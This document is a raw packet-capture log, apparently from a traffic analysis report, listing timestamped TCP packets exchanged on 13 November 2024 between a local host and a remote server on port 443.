                                                                                                                              Nov 13, 2024 16:28:06.857829094 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.857851982 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.871646881 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.871670961 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.871733904 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.871743917 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.871768951 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.891555071 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.936388016 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936407089 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936449051 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936486006 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936512947 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.936521053 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936589003 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.936959028 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.936979055 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.937026024 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.937030077 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.987445116 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.987466097 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.987570047 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.987596989 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.988563061 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.988576889 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.988612890 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.988619089 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.988645077 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.035727024 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.053179026 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053200006 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053272963 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.053296089 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053333044 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.053921938 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053939104 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053970098 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.053973913 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.053999901 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.054017067 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.055675030 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.055689096 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.055747032 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.055751085 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.055774927 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.055792093 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.104327917 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.104346991 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.104444027 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.104453087 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.104485989 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.105511904 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.105525970 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.105564117 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.105567932 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.105597019 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.170056105 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170082092 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170185089 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.170212030 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170249939 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.170767069 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170783997 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170818090 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.170824051 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.170850992 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.170867920 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.171685934 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.171706915 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.171752930 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.171758890 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.171782970 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.171799898 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.221138000 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.221164942 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.221204996 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.221213102 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.221249104 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.221266985 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.222955942 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.222981930 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.223014116 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.223016977 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.223053932 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.286812067 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.286838055 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.286900997 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.286917925 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.286941051 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.286962986 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288256884 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288280010 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288315058 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288320065 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288343906 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288362026 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288749933 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288767099 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288801908 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288805962 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.288836956 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.288853884 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.337696075 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.337721109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.337840080 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.337865114 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.337912083 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.338757992 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.338777065 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.338820934 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.338824987 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.338855982 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.338874102 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.339598894 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.339616060 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.339665890 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.339669943 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.339719057 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.404151917 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404176950 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404301882 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.404372931 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404429913 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.404653072 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404669046 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404745102 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.404750109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.404792070 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.444696903 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.444724083 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.444837093 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.444874048 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.444912910 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.455298901 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.455328941 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.455398083 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.455423117 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.455455065 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.455471039 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.455986977 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.456005096 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.456041098 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.456044912 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.456080914 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.456100941 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821012020 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821038008 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821110964 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821137905 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821166039 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821177006 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821352959 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821369886 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821417093 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821420908 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821453094 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821613073 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821630001 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821675062 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.821679115 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.821718931 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.822536945 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822559118 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822591066 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.822594881 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822633982 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.822779894 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822797060 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822841883 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.822845936 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.822897911 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.822897911 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.823211908 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.823227882 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.823266983 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.823271036 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.823318005 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.823913097 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.823932886 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.823976994 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.823981047 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824009895 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824019909 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.824043036 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824060917 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824085951 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.824090004 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824110985 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.824127913 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.824645996 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824662924 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824728966 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.824733019 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.824769020 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.828026056 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828047991 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828093052 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.828097105 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828140974 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.828485012 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828505993 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828550100 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.828552961 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.828593016 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.829129934 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829147100 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829180956 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.829184055 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829207897 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.829230070 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.829850912 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829900980 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829941034 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.829943895 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.829986095 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830591917 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830614090 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830648899 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830651999 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830673933 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830689907 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830807924 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830822945 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830862045 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830864906 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.830883980 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.830908060 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.831434011 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.831607103 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.831631899 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.831674099 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.831677914 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.831732035 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.832447052 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.832468033 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.832500935 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.832504988 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.832544088 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.832561016 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.832838058 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.833357096 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.833376884 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.833434105 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.833436966 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.833466053 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.833493948 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.848541021 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.848566055 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.848630905 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.848658085 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.848706961 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.871284962 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.871309996 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.871356964 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.871375084 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.871392012 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.871412992 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.872087955 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872102976 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872168064 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.872173071 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872211933 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.872737885 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872752905 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872807026 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.872812033 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.872852087 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.936954975 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.936981916 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937022924 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937053919 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.937079906 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937114000 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.937164068 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.937282085 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937298059 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937331915 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.937335968 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.937357903 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.965300083 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.965326071 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.965405941 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.965411901 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.987925053 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.987946987 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.988069057 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.988075018 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.988699913 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.988720894 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.988801003 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.988805056 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.989617109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.989633083 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:07.989720106 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:07.989725113 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.040770054 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.053781986 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.053808928 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.053909063 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.053914070 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.053957939 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.054171085 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054195881 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054243088 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.054246902 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054285049 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.054625034 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054642916 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054688931 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.054692984 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:08.054725885 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:08.081942081 CET44349705198.252.105.91192.168.2.5
